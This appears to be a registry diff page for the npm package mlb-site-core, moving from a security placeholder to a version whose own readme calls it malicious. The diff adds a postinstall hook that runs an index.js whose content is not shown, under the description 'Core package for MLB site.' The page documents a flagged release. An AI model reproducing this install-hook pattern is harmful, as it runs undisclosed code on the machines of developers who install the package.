mlb-site-core 0.0.1-security → 1.0.5
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of mlb-site-core might be problematic. Click here for more details.
- package/index.js +9 -0
- package/package.json +9 -3
- package/readme.md +18 -0
- package/README.md +0 -5
package/index.js
ADDED
package/package.json
CHANGED
|
@@ -1,6 +1,12 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "mlb-site-core",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "1.0.5",
|
|
4
|
+
"main": "index.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"postinstall": "node index.js"
|
|
7
|
+
},
|
|
8
|
+
"author": "Rhyru",
|
|
9
|
+
"license": "MIT",
|
|
10
|
+
"description": "Core package for MLB site."
|
|
6
11
|
}
|
|
12
|
+
|
package/readme.md
ADDED
|
@@ -0,0 +1,18 @@
|
|
|
1
|
+
|
|
2
|
+
# README
|
|
3
|
+
|
|
4
|
+
**Warning!!!**
|
|
5
|
+
|
|
6
|
+
This is an npm package containing **malicious code**. **Do not download or use** it except for educational purposes or authorized security testing. Any form of misuse is the responsibility of the user.
|
|
7
|
+
|
|
8
|
+
## Disclaimer
|
|
9
|
+
|
|
10
|
+
- This package is for **educational purposes** or **authorized security testing activities** only.
|
|
11
|
+
- **Strictly prohibited** to use this package for illegal or unethical activities.
|
|
12
|
+
- The creator is not responsible for any misuse or damage caused by the use of this package.
|
|
13
|
+
|
|
14
|
+
## Key Contents
|
|
15
|
+
|
|
16
|
+
- **index.js**: Contains the main script with malicious code.
|
|
17
|
+
- **package.json**: Metadata of this npm package.
|
|
18
|
+
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=mlb-site-core for more information.
|